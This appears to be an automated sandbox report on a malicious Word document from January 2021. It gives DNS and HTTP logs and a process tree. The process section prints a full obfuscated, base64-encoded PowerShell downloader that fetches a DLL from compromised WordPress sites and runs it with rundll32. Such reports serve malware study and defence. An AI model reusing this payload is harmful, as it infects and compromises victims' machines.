                                                                                  Jan 27, 2021 20:58:43.091973066 CET53612008.8.8.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:44.170552969 CET4954853192.168.2.228.8.8.8
                                                                                  Jan 27, 2021 20:58:44.221020937 CET53495488.8.8.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:44.225507975 CET5562753192.168.2.228.8.8.8
                                                                                  Jan 27, 2021 20:58:44.273590088 CET53556278.8.8.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:44.761415958 CET5600953192.168.2.228.8.8.8
                                                                                  Jan 27, 2021 20:58:44.809529066 CET53560098.8.8.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:44.812756062 CET6186553192.168.2.228.8.8.8
                                                                                  Jan 27, 2021 20:58:44.860712051 CET53618658.8.8.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:45.820265055 CET5517153192.168.2.228.8.8.8
                                                                                  Jan 27, 2021 20:58:45.989058018 CET53551718.8.8.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:46.616597891 CET5249653192.168.2.228.8.8.8
                                                                                  Jan 27, 2021 20:58:46.890113115 CET53524968.8.8.8192.168.2.22
                                                                                  Jan 27, 2021 20:58:47.522351027 CET5756453192.168.2.228.8.8.8
                                                                                  Jan 27, 2021 20:58:47.584250927 CET53575648.8.8.8192.168.2.22

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  Jan 27, 2021 20:58:41.851636887 CET192.168.2.228.8.8.80x82b3Standard query (0)ketoresetme.comA (IP address)IN (0x0001)
                                                                                  Jan 27, 2021 20:58:42.403414965 CET192.168.2.228.8.8.80xe9daStandard query (0)intellisavvy.comA (IP address)IN (0x0001)
                                                                                  Jan 27, 2021 20:58:42.547595978 CET192.168.2.228.8.8.80xfc39Standard query (0)intellisavvy.comA (IP address)IN (0x0001)
                                                                                  Jan 27, 2021 20:58:42.828968048 CET192.168.2.228.8.8.80xc229Standard query (0)mrveggy.comA (IP address)IN (0x0001)
                                                                                  Jan 27, 2021 20:58:45.820265055 CET192.168.2.228.8.8.80x9f83Standard query (0)hbprivileged.comA (IP address)IN (0x0001)
                                                                                  Jan 27, 2021 20:58:46.616597891 CET192.168.2.228.8.8.80x868Standard query (0)theo.digitalA (IP address)IN (0x0001)
                                                                                  Jan 27, 2021 20:58:47.522351027 CET192.168.2.228.8.8.80xac78Standard query (0)ummahstars.comA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Jan 27, 2021 20:58:42.058736086 CET8.8.8.8192.168.2.220x82b3No error (0)ketoresetme.com70.32.23.58A (IP address)IN (0x0001)
                                                                                  Jan 27, 2021 20:58:42.461323023 CET8.8.8.8192.168.2.220xe9daNo error (0)intellisavvy.com192.124.249.8A (IP address)IN (0x0001)
                                                                                  Jan 27, 2021 20:58:42.604012966 CET8.8.8.8192.168.2.220xfc39No error (0)intellisavvy.com192.124.249.8A (IP address)IN (0x0001)
                                                                                  Jan 27, 2021 20:58:43.091973066 CET8.8.8.8192.168.2.220xc229No error (0)mrveggy.com177.12.170.95A (IP address)IN (0x0001)
                                                                                  Jan 27, 2021 20:58:45.989058018 CET8.8.8.8192.168.2.220x9f83No error (0)hbprivileged.com35.209.96.32A (IP address)IN (0x0001)
                                                                                  Jan 27, 2021 20:58:46.890113115 CET8.8.8.8192.168.2.220x868No error (0)theo.digital35.209.174.246A (IP address)IN (0x0001)
                                                                                  Jan 27, 2021 20:58:47.584250927 CET8.8.8.8192.168.2.220xac78No error (0)ummahstars.com35.163.191.195A (IP address)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • ketoresetme.com
                                                                                  • intellisavvy.com
                                                                                  • 51.15.7.145

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.224916770.32.23.5880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Jan 27, 2021 20:58:42.228451967 CET0OUTGET /wp-content/Rk4rz/ HTTP/1.1
                                                                                  Host: ketoresetme.com
                                                                                  Connection: Keep-Alive
                                                                                  Jan 27, 2021 20:58:42.378906965 CET1INHTTP/1.1 403 Forbidden
                                                                                  Date: Wed, 27 Jan 2021 19:58:42 GMT
                                                                                  Server: Apache
                                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Content-Length: 318
                                                                                  Keep-Alive: timeout=3, max=500
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  1192.168.2.2249168192.124.249.880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Jan 27, 2021 20:58:42.502902985 CET1OUTGET /wp-admin/dRaG2H/ HTTP/1.1
                                                                                  Host: intellisavvy.com
                                                                                  Connection: Keep-Alive
                                                                                  Jan 27, 2021 20:58:42.543231964 CET2INHTTP/1.1 301 Moved Permanently
                                                                                  Server: Sucuri/Cloudproxy
                                                                                  Date: Wed, 27 Jan 2021 19:58:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: keep-alive
                                                                                  X-Sucuri-ID: 15008
                                                                                  Location: https://intellisavvy.com/wp-admin/dRaG2H/
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                  Jan 27, 2021 20:58:42.783210993 CET4INHTTP/1.1 301 Moved Permanently
                                                                                  Server: Sucuri/Cloudproxy
                                                                                  Date: Wed, 27 Jan 2021 19:58:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: keep-alive
                                                                                  X-Sucuri-ID: 15008
                                                                                  Location: https://intellisavvy.com/wp-admin/dRaG2H/
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  2192.168.2.224918451.15.7.14580C:\Windows\SysWOW64\rundll32.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Jan 27, 2021 21:00:34.622399092 CET457OUTPOST /mcbf10vnnn8hf/qv9l36h26wgbq5tqf/ HTTP/1.1
                                                                                  DNT: 0
                                                                                  Referer: 51.15.7.145/mcbf10vnnn8hf/qv9l36h26wgbq5tqf/
                                                                                  Content-Type: multipart/form-data; boundary=-----------------GbQkm8qOKaDBZZ6NN
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: 51.15.7.145
                                                                                  Content-Length: 6020
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  Jan 27, 2021 21:00:34.678353071 CET460INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                  Server: nginx/1.4.6 (Ubuntu)
                                                                                  Date: Wed, 27 Jan 2021 20:00:35 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 933
                                                                                  Connection: close
                                                                                  ETag: "4cefac17-3a5"


                                                                                  HTTPS Packets

                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                  Jan 27, 2021 20:58:43.601773024 CET177.12.170.95443192.168.2.2249171CN=mrveggy.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Jan 11 02:13:40 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sun Apr 11 03:13:40 CEST 2021 Wed Sep 29 21:21:40 CEST 2021769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                  Jan 27, 2021 20:58:48.022241116 CET35.163.191.195443192.168.2.2249178CN=www.ummahstars.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USFri Mar 20 12:52:22 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Thu May 19 22:40:05 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                  CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                  CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                  OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034

                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Start time:20:58:38
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                  Imagebase:0x13f820000
                                                                                  File size:1424032 bytes
                                                                                  MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:20:58:39
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoALwAvAGgAJwArACcAYgAnACkAKwAnAHAAcgAnACsAKAAnAGkAdgBpAGwAZQAnACsAJwBnACcAKwAnAGUAZAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvAGMAJwArACcAZwBpACcAKwAnAC0AYgBpAG4ALwBRACcAKQArACgAJwBnACcAKwAnAC8AQAAnACkAKwAoACcAcwAnACsAJwBnACAAJwApACsAJwB5AHcAJwArACgAJwAgAGEAaABzADoAJwArACcALwAnACkAKwAoACcALwB0AGgAZQBvACcAKwAnAC4AJwApACsAJwBkACcAKwAoACcAaQBnACcAKwAnAGkAJwApACsAKAAnAHQAYQBsACcAKwAnAC8AdwAnACkAKwAoACcAcAAnACsAJwAtAGEAZAAnACsAJwBtAGkAbgAnACkAKwAoACcALwAnACsAJwBaAHkAbAAnACkAKwAnADIAJwArACgAJwAvAEAAJwArACcAcwAnACkAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaAAnACsAJwBzADoAJwArACcALwAvAHUAJwApACsAJwBtAG0AJwArACcAYQBoACcAKwAnAHMAJwArACgAJwB0AGEAJwArACcAcgBzAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwBhACcAKwAnAHAAcAAnACsAJwBfACcAKwAnAG8AbAAnACsAJwBkACcAKwAnAF8AbQAnACsAJwBhACcAKwAoACcAeQBfACcAKwAnADIAJwApACsAJwAwACcAKwAnADEAOAAnACsAJwAvAGEAJwArACgAJwBzAHMAZQB0ACcAKwAnAHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAB4AC8AQABzAGcAJwArACcAIAAnACkAKwAoACcAeQB3ACcAKwAnACAAYQBoAHMAOgAvACcAKQArACcALwB3ACcAKwAnAHcAJwArACgAJwB3AC4AdAAnACsAJwBlAGUAJwApACsAKAAnAGwAZQAnACsAJwBrAGQAZQBkACcAKQArACcALgBjACcAKwAoACcAbwBtACcAKwAnAC8AYwAnACkAKwAoACcAZwBpAC0AYgAnACsAJwBpACcAKQArACgAJwBuACcAKwAnAC8ATAAnACkAKwAoACcAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAFAAbABhAEMARQAiACgAKAAoACcAcwBnACcAKwAnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAKAAnAGQAcwBlACcAKwAnAHcAJwApACsAJwBmACcAKQAsACgAKAAnAHcAZQAnACsAJwB2ACcAKQArACcAdwBlACcAKQApACwAKAAoACcAYQAnACsAJwBlAGYAJwApACsAJwBmACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAEkAVAAiACgAJABRADAANABQACAAKwAgACQAQgBiADIAdQAyAGMAOQAgACsAIAAkAEUANgAyAFgAKQA7ACQARwA3ADQAWAA9ACgAKAAnAEMAOAAnACsAJwAzACcAKQArACcARAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYAegB2ADMAMgBkADIAIABpAG4AIAAkAE4AcwB6AG8AOABpADEAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAJwArACcAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACcAKQAgAFMAeQBzAFQARQBNAC4AbgBlAHQALgB3AGUAQgBDAEwASQBlAG4AdAApAC4AIgBEAG8AYAB3AGAATgBsAG8AYABBAEQARgBJAEwARQAiACgAJABWAHoAdgAzADIAZAAyACwAIAAkAFIAZAB0AGEAbAA0AHYAKQA7ACQAWAA2AF8AVQA9ACgAJwBBACcAKwAoACcANAAxACcAKwAnAEUAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQAUgBkAHQAYQBsADQAdgApAC4AIgBsAGAARQBuAGcAdABIACIAIAAtAGcAZQAgADQAMwAxADMAMgApACAAewAuACgAJwByAHUAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABSAGQAdABhAGwANAB2ACwAKAAoACcAQQBuAHkAUwAnACsAJwB0AHIAJwApACsAJwBpACcAKwAnAG4AZwAnACkALgAiAFQATwBgAFMAVAByAGAASQBuAGcAIgAoACkAOwAkAEYAMgBfAFkAPQAoACcAQwAnACsAKAAnADAAJwArACcAMwBWACcAKQApADsAYgByAGUAYQBrADsAJABLADgAOQBaAD0AKAAnAEcAMwAnACsAJwA2AEwAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABDADAAMABLAD0AKAAnAFgAJwArACgAJwA2ADUAJwArACcASAAnACkAKQA=
                                                                                  Imagebase:0x4ab50000
                                                                                  File size:345088 bytes
                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:20:58:40
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\System32\msg.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:msg user /v Word experienced an error trying to open the file.
                                                                                  Imagebase:0xff490000
                                                                                  File size:26112 bytes
                                                                                  MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:20:58:40
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:powershell -w hidden -enc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJw